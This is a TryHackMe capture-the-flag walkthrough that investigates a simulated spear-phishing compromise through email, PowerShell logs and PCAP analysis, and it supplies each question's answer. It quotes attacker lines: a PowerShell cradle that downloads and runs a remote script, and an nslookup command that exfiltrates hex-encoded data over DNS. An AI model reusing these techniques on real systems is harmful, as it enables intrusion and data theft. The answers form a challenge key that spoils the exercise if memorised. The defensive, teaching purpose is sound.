Boogey Man I
TryHackMe Challenge Walkthrough
Challenge Overview
This challenge simulates a spear-phishing attack against a finance employee. Our goal is to analyze the artefacts, reconstruct the attack chain, and assess the adversary’s impact using PowerShell logs, PCAP data, and a phishing email.
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
Threat Analysis Summary
Analyst Summary Report
Incident Title
Spear-Phishing Leads to Data Exfiltration via DNS
Category
Phishing, Credential Access, Exfiltration, C2
Detection Source
PowerShell Logs, PCAP Network Traffic, Email Artefact
Impact
KeePass DB and credit card data were exfiltrated using DNS queries after the execution of a malicious PowerShell payload delivered via phishing.
Investigation Workflow
- 1. Email Analysis
- Opened and parsed the .eml file to identify sender, recipient, and attachment.
- 2.LNK Payload Inspection
- Parsed .lnk file with lnkparse3 to extract PowerShell payload.
- 3.PowerShell Log Review
- Used jq to extract and follow command execution sequence (download, discovery, enumeration, exfiltration).
- 4. PCAP Analysis
- Inspected HTTP traffic with Wireshark to confirm C2 methods and file transfers.
- Analyzed DNS queries to detect covert exfiltration.
- 5. Exfiltrated File Recovery
- Used tshark and CyberChef to reconstruct stolen data and extract credentials.
Recommendations
- Enforce attachment sandboxing and deep inspection on email gateways.
- Block access to known malicious infrastructure (e.g., *.bpakcaging.xyz).
- Enable Script Block Logging and monitor for suspicious PowerShell use.
- Monitor DNS query patterns for signs of covert data exfiltration.
- Deploy endpoint protection capable of detecting .lnk abuse and LOLBins.
- Train users to recognize phishing and avoid ZIP attachments from unknown sources.
Tools Used
- Thunderbird – Review of phishing .eml
- lnkparse3 – Extracted PowerShell from .lnk
- jq – Parsed powershell.json
- CyberChef – Decoded base64 and hex strings
- Wireshark / Tshark – Analyzed PCAP traffic and reconstructed exfiltrated file
- KeePassXC – Verified content of exfiltrated database
Key Evidences
- Phishing Attachment: Invoice_20230103.lnk embedded with malicious PowerShell
- Encoded PowerShell: Downloads payload from files.bpakcaging.xyz
- PowerShell Logs: Reveal use of Seatbelt, sq3.exe, and nslookup
- Stolen Files: plum.sqlite (Sticky Notes), protected_data.kdbx (KeePass DB)
- Exfil Method: DNS A record queries using nslookup
- C2 Traffic: POST requests to cdn.bpakcaging.xyz
Chain Attack Overview
Initial Access
Spear-phishing email with malicious LNK inside a ZIP
Execution
.lnk executes encoded PowerShell that downloads remote script
Defense Evasion
Living-off-the-land via PowerShell and nslookup
Discovery
Seatbelt.ps1 used for host and system enumeration
Credential Access
sq3.exe used to access Sticky Notes database
Collection
Retrieved KeePass DB and SQLite note data
Exfiltration
Data exfiltrated via nslookup over DNS with hex encoding
Command & Control
C2 established via HTTP POST to attacker-controlled domain
Impact
Sensitive data (KeePass credentials, credit card number) successfully stolen
MITRE ATT&CK Mapping
Phase
ID
Technique
Description
Initial Access
T1566.001
Phishing: Spear phishing Attachment
Malicious ZIP attachment with .lnk file
Execution
T1059.001
PowerShell
PowerShell payload executed from .lnk
Discovery
T1082
System Information Discovery
Seatbelt.ps1
Credential Access
T1555
Credentials from Password Stores
Accessed KeePass DB (protected_data.kdbx)
Collection
T1005
Data from Local System
Extraction of plum.sqlite, protected_data.kdbx
Exfiltration
T1048.003
Exfiltration Over Alternative Protocol: DNS
Used nslookup to exfiltrate encoded data
C2
T1071.001
Application Layer Protocol: Web Protocols
C2 via HTTP POST to cdn.bpakcaging.xyz
Reference: [MITRE ATT&CK Navigator] ( https://attack.mitre.org/ )
Q & A
Q1: What is the email address used to send the phishing email?
This is an easy one, we can just open dump.eml in Thunderbird, or grep the sender from the file in the terminal
Answer
agriffin@bpakcaging.xyz
Q2: What is the email address of the victim?
Again we can see it in thunderbird or we can grep “to:” from the file in the terminal.
Bash:
grep -i to: dump.eml
Answer
julianne.westcott@hotmail.com
Q3: What mail relay service was used?
In Thunderbird:
- Open the dump.eml file.
- Click More → View Source (or press Ctrl+U).
- This opens the raw email headers and body, where both DKIM-Signature and List-Unsubscribe are visible.
- Search (Ctrl+F) on the text editor for:
- DKIM-Signature
- List-Unsubscribe
Or we can feed the email header to an analyzer and get all our information
(or we can keep work with terminal and grep our DKIM..)
Answer
elasticmail
Q4: What is the file name in the encrypted ZIP?
Well, lets download the zip file from the email message and save it in our machine and open it.
note: .lnk files are often used to execute malicious payloads via disguised paths or embedded PowerShell commands
Answer
Invoice_20230103.lnk
Q5: What is the password of the encrypted archive?
We found it in email body.
Answer
Invoice2023!
Q6: What’s the encoded payload from LNK?
lnkparse Invoice_20230103.lnk
- check the answer with Cyberchef
- or check on cmd: echo “encoded file” | base64 -d
- the decoded result reveal a powershell command
- iex (new-object net.webclient).downloadstring(‘http://files.bpakcaging.xyz/update’)
- This means the shortcut silently launches a PowerShell instance that pulls and executes a remote script.
Answer
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
Q7: What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. [a.domain.com,b.domain.com](https://a.domain.com,b.domain.com))
As suggested in the intro, I used jq to extract PowerShell commands and focused on the ScriptBlockText field to identify URLs contacted during the attack.
cat powershell.json | jq '{ScriptBlockText}' | sort | uniq
This revealed two attacker-controlled domains used for file hosting and C2 communication.
We can already see what is happened here (a whoami started, sb.exe and sq3.exe, downloadstring from github invoke-seatbelt.ps1, an enumeration tool, looking for folders until he found a file, then using nslook up to send out chunks of the file to an external ip address, but i guess that is what we are going to answer in the next questions!)
Answer
cdn.bpakcaging.xyz,files.bpakcaging.xyz
8: What is the name of the enumeration tool downloaded by the attacker?
As anticipated before, the PowerShell logs shows a GitHub download of Seatbelt.ps1
note: usually github downloads started by Powershell are major red flags!
Answer
Seatbelt
Q9: What is the file accessed by the attacker using the downloaded **sq3.exe** binary? Provide the full file path with escaped backslashes.
HINT – trace back the executed cd command
By filtering for sq3.exe and checking for prior cd commands, I found that the attacker accessed a Sticky Notes SQLite database belonging to the user j.westcott
cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[] | {ScriptBlockText}' | grep 'sq3.exe' 
we obtain the path AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
we need to know the username to complete the path
cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]'| jq '{ScriptBlockText}'| grep 'cd' and we find the the user is j.westcott
Answer
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Q10: What is the software that uses the file in Q3?
The file path points to the local database used by Microsoft Sticky Notes.
Answer
Microsoft Sticky Notes
Q11: What is the name of the exfiltrated file?
I found a ScriptBlockText line where the attacker listed a file in the victim’s Documents folder.
Answer
protected_data.kdbx
Q12: What type of file uses the .kdbx file extension?
we can see this line
The PowerShell log shows data being split using a regex for 50-character hex chunks — indicating hex encoding.
Answer
hex
Q14: What is the tool used for exfiltration?
The exfiltration method used nslookup to send hex-encoded data as DNS queries to an attacker-controlled domain, as we can see in the same line.
note:
After the data is encoded, we’ll see another command which appears to be using _DNS_ to query the _A record_ of attacker-controlled infrastructure at the _$destination_ variable
This looks like it might be a living off the land exfiltration technique where targeted data is encoded, split to a character limit, and then exfiltrated though _DNS_ queries to the adversary’s infrastructure by appending the data (the _$line_ variable) to a domain name where it can be reassembled or interpreted by the adversary.
Answer
nslookup
Q15: What software is used by the attacker to host its presumed file/payload server?
HINT: Review the headers of the HTTP requests going to the server hosting malicious files used by the attacker.
we already know that the file server is files.bpakcaging.xyz, so I filtered for that host in Wireshark
WireShark Query:
http.host == files.bpakcaging.xyz
the row with the get /sq3.exe -> follow the HTTP stream
in the response section we find the software used to host the file
Answer
Python
Q16: What HTTP method is used by the C2 for the output of the commands executed by the attacker?
HINT: Using the known bad domains, find the C2 traffic and follow the streams.
We actually saw at the beginning using jq, after the attacker split the document in chunks, he used POST method
Alternatively, using the hint, I filtered Wireshark traffic by the known C2 domain and followed the TCP stream.
The HTTP request showed the attacker used POST to send data.
WireShark Query:
PROCESS http.host contains "bpakcaging.xyz"
Then: Right-click → Follow → TCP Stream
In the packet with POST request we can see encoded strings, that in cyberchef shows its our documents
Answer
POST
Q17: What is the protocol used during the exfiltration activity?
Previously with jq we PowerShell logs revealed the use of nslookup with hex-encoded data sent as DNS A record queries to an attacker-controlled domain, a covert exfiltration method.
nslookup -q=A “$line.bpakcaging.xyz
Answer
DNS
Q18: What is the password of the exfiltrated file?
HINT: The password is stored in the database file accessed by the attacker using the sq3.exe binary.
We already found that the attacker used sq3.exe to access “plum.sqlite”
In Wireshark, I filtered for HTTP containing our “plum.sqlite” and then followed the tpc stream
We can see a command “SELECT * from NOTE”, so I looked at the following packet (750) to see what happen next.
The response contained decimal-encoded characters, which I decoded in CyberChef using the From Decimal function to recover the password.
Answer
%p9^3!lL^Mz47E2GaT^y
Q19: What is the credit card number stored inside the exfiltrated file?
hint: Retrieve the exfiltrated file first using Tshark and focus on the query type used shown in the PowerShell logs.
As suggested, I used tshark to analyze the DNS exfiltration traffic from the PCAP file.
The attacker used nslookup (-q=A) to split hex-encoded data into subdomain queries sent to bpakcaging.xyz.
We also know the destination ip address: 167.71.1.211.113
So lets use Tshark as suggested
To extract the data, I ran the following command (after a bit of cleaning I obtained this one, I spare you the long process):
tshark -r capture.pcapng -Y 'dns' -T fields -e dns.qry.name | grep ".bpakcaging.xyz" | cut -f1 -d '.' | grep -v -e "files" -e "cdn" | uniq | tr -d '\n' > card.txt
Explanation of command:
- -r capture.pcapng: read the packet capture file
- -Y ‘dns’: filter only DNS packets
- -T fields -e dns.qry.name: print only the DNS query names
- grep “.bpakcaging.xyz”: include only queries sent to the attacker’s domain
- cut -f1 -d ‘.’: extract only the helex-encoded part (before the first dot)
- grep -v: exclude entries from unrelated subdomains like files and cdn
- uniq | tr -d ‘\\n’: remove duplicates and newlines
- > card.txt: save the final hex string to a file
from here just convert the card.txt in a dkbx file using xxd
xxd -r -p card.txt > card kdbx
Using the previously discovered password, I unlocked the file and found the stored credit card number.
Answer
4024007128269551
Conclusion
Well, turns out clicking on shady ZIPs from fake business partners still isn’t a great idea.
Who knew? From a seemingly harmless .lnk file, the attacker went full Boogeyman -> launching PowerShell voodoo, poking around the system with Seatbelt, dumping Sticky Notes like it’s 2009, and exfiltrating a KeePass database one DNS query at a time.
Honestly, impressive commitment to living off the land.